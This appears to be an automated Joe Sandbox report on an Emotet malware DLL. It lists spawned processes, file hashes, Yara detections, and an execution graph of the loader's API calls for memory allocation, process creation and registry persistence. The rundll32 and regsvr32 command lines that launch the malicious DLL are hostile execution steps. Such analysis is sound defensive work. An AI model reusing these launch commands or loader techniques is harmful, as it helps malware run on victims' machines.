                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.488528971.000001942A5D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:1
                                                                    Start time:13:57:12
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1
                                                                    Imagebase:0x7ff6a6590000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:13:57:13
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\MIpuuSiSZ4.dll
                                                                    Imagebase:0x7ff655380000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.454942955.0000000001411000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.454887422.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:3
                                                                    Start time:13:57:13
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1
                                                                    Imagebase:0x7ff66c6b0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000000.457523835.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.500443188.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.499993940.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000000.457466014.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000000.448855621.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000000.448792384.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:13:57:13
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddStroke
                                                                    Imagebase:0x7ff66c6b0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.503233757.0000021313901000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000000.458204040.0000021313901000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000000.457983091.0000021313760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000000.454361313.0000021313901000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000000.454167344.0000021313760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.503043476.0000021313760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:5
                                                                    Start time:13:57:17
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddWordsToWordList
                                                                    Imagebase:0x7ff66c6b0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.460329273.0000016A80010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.460399040.0000016A80071000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:6
                                                                    Start time:13:57:21
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AdviseInkChange
                                                                    Imagebase:0x7ff66c6b0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.468293754.00000195C58D1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.468234789.00000195C5870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:10
                                                                    Start time:13:57:51
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:11
                                                                    Start time:13:57:52
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160
                                                                    Imagebase:0x7ff7fe6b0000
                                                                    File size:494488 bytes
                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:12
                                                                    Start time:13:57:54
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll"
                                                                    Imagebase:0x7ff655380000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.883306468.0000000001000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.883481925.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_3, Description: , Source: 0000000C.00000002.882519844.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                    Target ID:13
                                                                    Start time:13:57:55
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 516 -p 3896 -ip 3896
                                                                    Imagebase:0x7ff7fe6b0000
                                                                    File size:494488 bytes
                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:14
                                                                    Start time:13:57:55
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:15
                                                                    Start time:13:58:01
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6160 -s 336
                                                                    Imagebase:0x7ff7fe6b0000
                                                                    File size:494488 bytes
                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:16
                                                                    Start time:13:58:02
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3896 -s 328
                                                                    Imagebase:0x7ff7fe6b0000
                                                                    File size:494488 bytes
                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:17
                                                                    Start time:13:58:11
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YbTPHZsAWIZFUi\eAeQcUPg.dll"
                                                                    Imagebase:0x7ff655380000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:20
                                                                    Start time:13:58:39
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:22
                                                                    Start time:13:58:51
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:24
                                                                    Start time:13:59:10
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff6ec1c0000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:28
                                                                    Start time:13:59:32
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:30
                                                                    Start time:13:59:44
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff7e8070000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:4%
                                                                      Dynamic/Decrypted Code Coverage:46.5%
                                                                      Signature Coverage:45.1%
                                                                      Total number of Nodes:71
                                                                      Total number of Limit Nodes:7
                                                                      execution_graph 39156 1942a6818e0 39159 1942a68a804 39156->39159 39158 1942a6819fe 39162 1942a68a848 39159->39162 39160 1942a68ab06 Process32NextW 39160->39162 39161 1942a68ab3a 39161->39158 39162->39160 39162->39161 39163 180001e0c 39179 180001590 39163->39179 39165 180001e56 ExitProcess 39166 180001fa3 39165->39166 39167 180001e66 RegDeleteKeyW RegCreateKeyExW 39165->39167 39182 1800028f0 8 API calls 2 library calls 39166->39182 39168 180001ed4 GetModuleFileNameW RegSetValueExW 39167->39168 39169 180001ebf 39167->39169 39168->39169 39172 180001f1f 39168->39172 39171 180001ec4 RegCloseKey 39169->39171 39171->39166 39181 1800011ac 5 API calls memcpy_s 39172->39181 39173 180001fb4 39175 180001f30 39175->39171 39176 180001f39 RegSetValueExW 39175->39176 39176->39171 39177 180001f6d RegSetValueExW 39176->39177 39177->39171 39178 180001f9d RegCloseKey 39177->39178 39178->39166 39180 180001677 39179->39180 39180->39165 39181->39175 39182->39173 39183 18003f930 39184 18003f97b 39183->39184 39188 18003f93f BuildCatchObjectHelperInternal 39183->39188 39193 180013b18 11 API calls _set_errno_from_matherr 39184->39193 39185 18003f962 RtlAllocateHeap 39187 18003f979 39185->39187 39185->39188 39188->39184 39188->39185 39190 180039c28 39188->39190 39194 180039c64 39190->39194 39193->39187 39199 180042070 EnterCriticalSection 39194->39199 39196 180039c71 39197 1800420c4 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 39196->39197 39198 180039c36 39197->39198 39198->39188 39200 1942a68e4a8 39201 1942a68e4e8 39200->39201 39204 1942a687414 39201->39204 39203 1942a68e6b6 39206 1942a6874b5 39204->39206 39205 1942a6875e6 CreateProcessW 39205->39203 39206->39205 39207 19428c20000 39208 19428c20183 39207->39208 39209 19428c2043e VirtualAlloc 39208->39209 39213 19428c20462 39209->39213 39210 19428c20a7b 39211 19428c20531 GetNativeSystemInfo 39211->39210 39212 19428c2056d VirtualAlloc 39211->39212 39214 19428c2058b VirtualAlloc 39212->39214 39217 19428c205a0 39212->39217 39213->39210 39213->39211 39214->39217 39215 19428c20a00 39215->39210 39216 19428c20a56 RtlAvlRemoveNode 39215->39216 39216->39210 39217->39215 39218 19428c209d9 VirtualProtect 39217->39218 39218->39217 39219 180002810 39222 18000281b 39219->39222 39220 180002834 39221 180039c28 BuildCatchObjectHelperInternal 2 API calls 39221->39222 39222->39220 39222->39221 39223 18000283a 39222->39223 39224 180002845 39223->39224 39228 180002eb8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 39223->39228 39229 180002ed8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 39224->39229 39227 18000284b 39229->39227 39230 1942a6793ac 39237 1942a6793f7 39230->39237 39231 1942a67aeb4 39243 1942a68f764 CreateProcessW 39231->39243 39233 1942a67ae75 39237->39231 39237->39233 39239 1942a683e18 Process32NextW 39237->39239 39240 1942a68762c Process32NextW 39237->39240 39241 1942a6893e0 Process32NextW 39237->39241 39242 1942a696b40 CreateProcessW 39237->39242 39239->39237 39240->39237 39241->39237 39242->39237 39243->39233

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 19428c20000-19428c20460 call 19428c20aa8 * 2 VirtualAlloc 22 19428c2048a-19428c20494 0->22 23 19428c20462-19428c20466 0->23 26 19428c2049a-19428c2049e 22->26 27 19428c20a91-19428c20aa6 22->27 24 19428c20468-19428c20488 23->24 24->22 24->24 26->27 28 19428c204a4-19428c204a8 26->28 28->27 29 19428c204ae-19428c204b2 28->29 29->27 30 19428c204b8-19428c204bf 29->30 30->27 31 19428c204c5-19428c204d2 30->31 31->27 32 19428c204d8-19428c204e1 31->32 32->27 33 19428c204e7-19428c204f4 32->33 33->27 34 19428c204fa-19428c20507 33->34 35 19428c20509-19428c20511 34->35 36 19428c20531-19428c20567 GetNativeSystemInfo 34->36 37 19428c20513-19428c20518 35->37 36->27 38 19428c2056d-19428c20589 VirtualAlloc 36->38 39 19428c2051a-19428c2051f 37->39 40 19428c20521 37->40 41 19428c2058b-19428c2059e VirtualAlloc 38->41 42 19428c205a0-19428c205ac 38->42 43 19428c20523-19428c2052f 39->43 40->43 41->42 44 19428c205af-19428c205b2 42->44 43->36 43->37 45 19428c205b4-19428c205bf 44->45 46 19428c205c1-19428c205db 44->46 45->44 47 19428c2061b-19428c20622 46->47 48 19428c205dd-19428c205e2 46->48 49 19428c206db-19428c206e2 47->49 50 19428c20628-19428c2062f 47->50 51 19428c205e4-19428c205ea 48->51 55 19428c20864-19428c2086b 49->55 56 19428c206e8-19428c206f9 49->56 50->49 54 19428c20635-19428c20642 50->54 52 19428c2060b-19428c20619 51->52 53 19428c205ec-19428c20609 51->53 52->47 52->51 53->52 53->53 54->49 59 19428c20648-19428c2064f 54->59 57 19428c20917-19428c20929 55->57 58 19428c20871-19428c2087f 55->58 60 19428c20702-19428c20705 56->60 61 19428c20a07-19428c20a1a 57->61 62 19428c2092f-19428c20937 57->62 63 19428c2090e-19428c20911 58->63 64 19428c20654-19428c20658 59->64 65 19428c20707-19428c2070a 60->65 66 19428c206fb-19428c206ff 60->66 87 19428c20a1c-19428c20a27 61->87 88 19428c20a40-19428c20a4a 61->88 68 19428c2093b-19428c2093f 62->68 63->57 67 19428c20884-19428c208a9 63->67 69 19428c206c0-19428c206ca 64->69 70 19428c20788-19428c2078e 65->70 71 19428c2070c-19428c2071d 65->71 66->60 94 19428c20907-19428c2090c 67->94 95 19428c208ab-19428c208b1 67->95 74 19428c20945-19428c2095a 68->74 75 19428c209ec-19428c209fa 68->75 72 19428c2065a-19428c20669 69->72 73 19428c206cc-19428c206d2 69->73 76 19428c20794-19428c207a2 70->76 71->76 77 19428c2071f-19428c20720 71->77 83 19428c2067a-19428c2067e 72->83 84 19428c2066b-19428c20678 72->84 73->64 79 19428c206d4-19428c206d5 73->79 81 19428c2097b-19428c2097d 74->81 82 19428c2095c-19428c2095e 74->82 75->68 85 19428c20a00-19428c20a01 75->85 89 19428c207a8 76->89 90 19428c2085d-19428c2085e 76->90 86 19428c20722-19428c20784 77->86 79->49 99 19428c2097f-19428c20981 81->99 100 19428c209a2-19428c209a4 81->100 96 19428c2096e-19428c20979 82->96 97 19428c20960-19428c2096c 82->97 101 19428c2068c-19428c20690 83->101 102 19428c20680-19428c2068a 83->102 98 19428c206bd-19428c206be 84->98 85->61 86->86 103 19428c20786 86->103 104 19428c20a38-19428c20a3e 87->104 92 19428c20a7b-19428c20a8e 88->92 93 19428c20a4c-19428c20a54 88->93 91 19428c207ae-19428c207d4 89->91 90->55 125 19428c207d6-19428c207d9 91->125 126 19428c20835-19428c20839 91->126 92->27 93->92 106 19428c20a56-19428c20a79 RtlAvlRemoveNode 93->106 94->63 115 19428c208bb-19428c208c8 95->115 116 19428c208b3-19428c208b9 95->116 107 19428c209be-19428c209bf 96->107 97->107 98->69 108 19428c20989-19428c2098b 99->108 109 19428c20983-19428c20987 99->109 113 19428c209a6-19428c209aa 100->113 114 19428c209ac-19428c209bb 100->114 111 19428c206a5-19428c206a9 101->111 112 19428c20692-19428c206a3 101->112 110 19428c206b6-19428c206ba 102->110 103->76 104->88 105 19428c20a29-19428c20a35 104->105 105->104 106->92 121 19428c209c5-19428c209cb 107->121 108->100 119 19428c2098d-19428c2098f 108->119 109->107 110->98 111->98 120 19428c206ab-19428c206b3 111->120 112->110 113->107 114->107 123 19428c208ca-19428c208d1 115->123 124 19428c208d3-19428c208e5 115->124 122 19428c208ea-19428c208fe 116->122 127 19428c20999-19428c209a0 119->127 128 19428c20991-19428c20997 119->128 120->110 129 19428c209d9-19428c209e9 VirtualProtect 121->129 130 19428c209cd-19428c209d3 121->130 122->94 141 19428c20900-19428c20905 122->141 123->123 123->124 124->122 132 19428c207db-19428c207e1 125->132 133 19428c207e3-19428c207f0 125->133 134 19428c20844-19428c20850 126->134 135 19428c2083b 126->135 127->121 128->107 129->75 130->129 137 19428c20812-19428c2082c 132->137 138 19428c207fb-19428c2080d 133->138 139 19428c207f2-19428c207f9 133->139 134->91 140 19428c20856-19428c20857 134->140 135->134 137->126 143 19428c2082e-19428c20833 137->143 138->137 139->138 139->139 140->90 141->95 143->125
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488294571.0000019428C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019428C20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_19428c20000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$InfoNativeNodeProtectRemoveSystem
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 808794760-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: 0874a8a0b0900886e8a5a8077ae7e9935a68510c32a67885b6571797f9dcd49d
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 1172E630514A488BEB59DF19D8A5BEDB7E0FB54314F10462EF88AC3299DF34D542CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 292 1942a675b18-1942a675b35 293 1942a675b3a-1942a675b3f 292->293 294 1942a676269-1942a67626e 293->294 295 1942a675b45 293->295 296 1942a676274-1942a676279 294->296 297 1942a676482-1942a676517 call 1942a672ae4 call 1942a696784 294->297 298 1942a675b4b-1942a675b50 295->298 299 1942a676170-1942a676264 call 1942a69093c call 1942a696784 call 1942a67f7bc 295->299 302 1942a6763cf-1942a67647d call 1942a67c290 296->302 303 1942a67627f-1942a676284 296->303 327 1942a67651c-1942a676596 call 1942a67f7bc 297->327 304 1942a676076-1942a6760da call 1942a690c68 call 1942a696784 298->304 305 1942a675b56-1942a675b5b 298->305 299->293 302->293 309 1942a6765ab-1942a67661a call 1942a6824e4 call 1942a696784 303->309 310 1942a67628a-1942a67628f 303->310 341 1942a6760df-1942a67616b call 1942a67f7bc 304->341 312 1942a675f14-1942a675fc7 call 1942a682f94 call 1942a696784 305->312 313 1942a675b61-1942a675b66 305->313 344 1942a67661f-1942a67668a call 1942a67f7bc 309->344 319 1942a67659b-1942a6765a0 310->319 320 1942a676295-1942a676339 call 1942a6913fc call 1942a696784 310->320 346 1942a675fcc-1942a676071 call 1942a67f7bc 312->346 322 1942a675dce-1942a675e59 call 1942a683bb4 call 1942a696784 313->322 323 1942a675b6c-1942a675b71 313->323 333 1942a6765a6 319->333 334 1942a67668f-1942a676695 319->334 353 1942a67633e-1942a6763ca call 1942a67f7bc 320->353 355 1942a675e5e-1942a675f0f call 1942a67f7bc 322->355 331 1942a675b77-1942a675b7c 323->331 332 1942a675c95-1942a675d2e call 1942a68b558 call 1942a696784 323->332 327->319 331->319 343 1942a675b82-1942a675c90 call 1942a6899f4 call 1942a696784 call 1942a67f7bc 331->343 364 1942a675d33-1942a675dc9 call 1942a67f7bc 332->364 333->293 341->293 343->293 344->334 346->293 353->293 355->293 364->293
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !$iv$uu$uu
                                                                      • API String ID: 0-314779803
                                                                      • Opcode ID: a069519de9736d73189d9faaea8c501be380269cbcff7f4135135816eaaf98e3
                                                                      • Instruction ID: 30e65c8d874d65bcc1fb7739369bca7eed843fc832624ce1e716666ef50d301e
                                                                      • Opcode Fuzzy Hash: a069519de9736d73189d9faaea8c501be380269cbcff7f4135135816eaaf98e3
                                                                      • Instruction Fuzzy Hash: 7272FC7150064A8FDF48DF28D89A5DE3FA1FB68388F21422DFC4A962A0D778D595CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %V"$;<8$>A%3$_
                                                                      • API String ID: 0-3295070022
                                                                      • Opcode ID: c03509b85431d9cd247ae3855a418badeaf1e36b81dfd63c0d88c72341702a4b
                                                                      • Instruction ID: 3170ccaac44e52c3f10a78823e915be9d89f9764d1d0aca5d38482213dd77fc1
                                                                      • Opcode Fuzzy Hash: c03509b85431d9cd247ae3855a418badeaf1e36b81dfd63c0d88c72341702a4b
                                                                      • Instruction Fuzzy Hash: 2CD1D071529780ABD388DF28C59A95BBBF1FBC4758F806A1DF8C6862A0D774D805CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$<?xA$`_v
                                                                      • API String ID: 0-322589193
                                                                      • Opcode ID: 63cd386463e6a462864f6b142ccf92f9548a1f47b3a6b5e10305d83b177dfbd5
                                                                      • Instruction ID: 58e4277105143b810af70daf8cfcb57ecc80dcb854fe244432cf695c1fbf73d5
                                                                      • Opcode Fuzzy Hash: 63cd386463e6a462864f6b142ccf92f9548a1f47b3a6b5e10305d83b177dfbd5
                                                                      • Instruction Fuzzy Hash: 8C5208B0A047888FDBB8CF64C8996DD7BF0FB48318F90421DEA4A9B291CB745645CF09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [f$\$1
                                                                      • API String ID: 0-3516292800
                                                                      • Opcode ID: fff8eda2a2f97c74ebe90de9de009a0ff03563e687b00f5f7246eec12eb55319
                                                                      • Instruction ID: 1f68ed43bd021f6511a4d2ad1ba671ea1fb74950ce701a44b32001a92759fbbf
                                                                      • Opcode Fuzzy Hash: fff8eda2a2f97c74ebe90de9de009a0ff03563e687b00f5f7246eec12eb55319
